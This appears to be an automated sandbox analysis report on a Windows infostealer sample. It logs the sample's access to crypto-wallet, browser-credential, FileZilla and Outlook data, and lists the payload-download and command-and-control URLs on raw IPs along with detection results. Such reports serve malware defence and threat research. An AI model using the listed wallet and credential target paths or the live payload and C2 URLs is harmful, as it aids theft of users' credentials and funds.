Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                        Source: Yara matchFile source: 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        3
                        Obfuscated Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol4
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        12
                        Software Packing
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDS236
                        System Information Discovery
                        Distributed Component Object ModelInput Capture112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets761
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Process Injection
                        DCSync251
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467934 Sample: file.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 16 other signatures 2->54 8 file.exe 36 2->8         started        13 explorti.exe 12 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 42 85.28.47.30, 49730, 80 GES-ASRU Russian Federation 8->42 44 77.91.77.81, 49731, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->44 34 C:\Users\user\AppData\...\JJEGIJEGDB.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->38 dropped 40 11 other files (7 malicious) 8->40 dropped 64 Detected unpacking (changes PE section rights) 8->64 66 Tries to steal Mail credentials (via file / registry access) 8->66 68 Found many strings related to Crypto-Wallets (likely being stolen) 8->68 76 4 other signatures 8->76 17 cmd.exe 1 8->17         started        19 cmd.exe 2 8->19         started        46 77.91.77.82, 49744, 49745, 49746 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 13->46 70 Hides threads from debuggers 13->70 72 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->72 74 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->74 file5 signatures6 process7 process8 21 JJEGIJEGDB.exe 4 17->21         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        file9 32 C:\Users\user\AppData\Local\...\explorti.exe, PE32 21->32 dropped 56 Antivirus detection for dropped file 21->56 58 Multi AV Scanner detection for dropped file 21->58 60 Detected unpacking (changes PE section rights) 21->60 62 6 other signatures 21->62 29 explorti.exe 21->29         started        signatures10 process11 signatures12 78 Antivirus detection for dropped file 29->78 80 Multi AV Scanner detection for dropped file 29->80 82 Detected unpacking (changes PE section rights) 29->82 84 7 other signatures 29->84

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe47%VirustotalBrowse
                        file.exe100%AviraTR/Crypt.ZPACK.Gen
                        file.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe42%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe42%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe42%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        http://upx.sf.net0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                        https://support.mozilla.org0%URL Reputationsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/mine/amadka.exe100%Avira URL Cloudphishing
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://77.91.77.81/cost/go.exe100%Avira URL Cloudmalware
                        http://77.91.77.81/mine/amadka.exe27%VirustotalBrowse
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpG0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dll0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpt.0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%Avira URL Cloudsafe
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dll=100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exe28%VirustotalBrowse
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpG21%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpZ0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://85.28.47.30/69934896f997d5bb/nss3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/100%Avira URL Cloudphishing
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php-0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/nss3.dlldf100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpZ22%VirustotalBrowse
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/nss3.dll0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.php/22%VirustotalBrowse
                        http://85.28.47.30/920475a59bac849d.phpI100%Avira URL Cloudmalware
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php22%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dll4%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/mozglue.dllhg100%Avira URL Cloudmalware
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe0%Avira URL Cloudsafe
                        http://85.28.47.30/920475a59bac849d.phpI0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php90%Avira URL Cloudsafe
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe-Disposition:100%Avira URL Cloudphishing
                        http://77.91.77.81/mine/amadka.exeQ100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.php24%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe00100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.php40971b6b0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.php-21%VirustotalBrowse
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe-Disposition:25%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exeQ19%VirustotalBrowse
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        85.28.47.30/920475a59bac849d.php100%Avira URL Cloudmalware
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe0025%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php8.0%Avira URL Cloudsafe
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%VirustotalBrowse
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        http://85.28.47.30/920475a59bac849d.php100%Avira URL Cloudmalware
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dll100%Avira URL Cloudmalware
                        85.28.47.30/920475a59bac849d.php2%VirustotalBrowse
                        http://77.91.77.81/cost/go.exeData100%Avira URL Cloudphishing
                        http://77.91.77.81/cost/go.exe00100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.php#100%Avira URL Cloudphishing
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.php920%VirustotalBrowse
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/mozglue.dll100%Avira URL Cloudmalware
                        https://ac.ecopnacl0%Avira URL Cloudsafe
                        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dll0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpq)0%Avira URL Cloudsafe
                        http://85.28.47.30100%Avira URL Cloudmalware
                        https://ac.ecop0%Avira URL Cloudsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://77.91.77.81/mine/amadka.exefalse
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.30/69934896f997d5bb/softokn3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/freebl3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phptrue
                        • 24%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dlltrue
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        85.28.47.30/920475a59bac849d.phptrue
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/920475a59bac849d.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/mozglue.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabCFIEGDAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFHDAFBGIJKEGIECAAFHDHDGCBFC.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
